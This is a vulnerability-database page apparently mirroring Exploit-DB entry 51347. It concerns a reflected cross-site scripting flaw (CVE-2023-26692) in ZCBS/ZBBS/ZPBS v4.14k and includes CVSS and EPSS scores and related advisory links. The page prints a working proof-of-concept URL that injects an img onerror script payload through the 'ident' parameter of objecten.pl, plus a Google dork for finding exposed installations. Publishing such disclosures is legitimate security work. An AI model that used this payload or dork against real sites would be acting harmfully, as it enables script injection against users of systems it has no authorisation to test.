Lucene search
Abdulaziz SaadEDB-ID:51347HistoryApr 08, 2023 - 12:00 a.m.
ZCBS/ZBBS/ZPBS v4.14k - Reflected Cross-Site Scripting (XSS)
2023-04-0800:00:00
Abdulaziz Saad
www.exploit-db.com
97
vulnerability
exploit
reflected cross-site scripting
zcbs
zbbs
zpbs
4.14k
cve-2023-26692
abdulaziz saad
vendor homepage
lamp
ubuntu
google dork
ident parameter
objecten.pl
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
0.001 Low
EPSS
Percentile
38.1%
# Exploit Title: ZCBS/ZBBS/ZPBS v4.14k - Reflected Cross-Site Scripting (XSS)
# Date: 2023-03-30
# CVE: CVE-2023-26692
# Exploit Author: Abdulaziz Saad (@b4zb0z)
# Vendor Homepage: https://www.zcbs.nl
# Version: 4.14k
# Tested on: LAMP, Ubuntu
# Google Dork: inurl:objecten.pl?ident=3D
---
[#] Vulnerability :
`$_GET['ident']`
[#] Exploitation :
`https://localhost/cgi-bin/objecten.pl?ident=3D%3Cimg%20src=3Dx%20onerror=
=3Dalert(%22XSS%22)%3E`Related
cve
cve
CVE-2023-26692
2023-03-30 20:15:07
prion
prion
Cross site scripting
2023-03-30 20:15:00
packetstorm
packetstorm
ZCBS / ZBBS / ZPBS 4.14k Cross Site Scripting
2023-04-10 00:00:00
cvelist
cvelist
CVE-2023-26692
2023-03-30 00:00:00
nvd
nvd
CVE-2023-26692
2023-03-30 20:15:07
zdt
zdt
ZCBS / ZBBS / ZPBS v4.14k - Reflected Cross-Site Scripting Vulnerability
2023-04-08 00:00:00
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
0.001 Low
EPSS
Percentile
38.1%
Related for EDB-ID:51347